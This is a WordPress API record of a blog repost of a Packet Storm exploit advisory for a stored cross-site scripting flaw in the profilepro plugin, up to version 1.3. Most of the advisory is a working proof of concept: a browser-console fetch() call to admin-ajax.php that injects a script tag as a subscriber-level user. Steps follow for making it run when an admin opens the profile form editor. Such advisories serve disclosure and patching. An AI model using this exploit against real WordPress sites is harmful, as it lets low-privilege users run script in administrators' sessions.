{"id":58843,"date":"2024-08-13T18:50:00","date_gmt":"2024-08-13T15:50:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180083\/wpprofilepro13-xss.txt"},"modified":"2024-08-13T18:50:00","modified_gmt":"2024-08-13T15:50:00","slug":"wordpress-profilepro-1-3-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-profilepro-1-3-cross-site-scripting\/","title":{"rendered":"WordPress Profilepro 1.3 Cross Site Scripting"},"content":{"rendered":"

# Exploit Title: profilepro <= 1.3 – Subscriber+ Stored Cross Site Scripting
# Date: 15-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https:\/\/wordpress.org\/plugins\/profilepro\/
# Version: <= 1.3
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org<\/p>\n

Description<\/p>\n

The plugin does not sanitise and escape some parameters and lacks proper
access controls, which could allow users with a role as low as subscriber
to perform Cross-Site Scripting attacks<\/p>\n

Proof of Concept<\/p>\n

Run the following code from the browser console from the subscriber user<\/p>\n

“`
fetch(“..\/wp-admin\/admin-ajax.php”, {
method: “POST”,
headers: {
“Accept”: “*\/*”,
“Content-Type”: “application\/x-www-form-urlencoded; charset=UTF-8”,
“X-Requested-With”: “XMLHttpRequest”
},
body:
“title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89”,
credentials: “include”
})
.then(response => {
if (!response.ok) {
throw new Error(‘Network response was not ok’);
}
return response.text();
})
.then(data => console.log(data))
.catch(error => console.error(‘Error:’, error));
“`<\/p>\n

– As an admin, go to
http:\/\/example.com\/wp-admin\/edit.php?post_type=profilepro_form
– Choose the default profile, click on edit and click on add field, XSS
will pop up.<\/p>\n

Reference:
https:\/\/wpscan.com\/vulnerability\/8faf1409-44e6-4ebf-9a68-b5f93a5295e9\/<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: profilepro <= 1.3 – Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https:\/\/wordpress.org\/plugins\/profilepro\/# Version: <= 1.3# Tested on: Firefox# Contact me: vulns@vulnseeker.org Description The plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58843","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58843"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58843\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}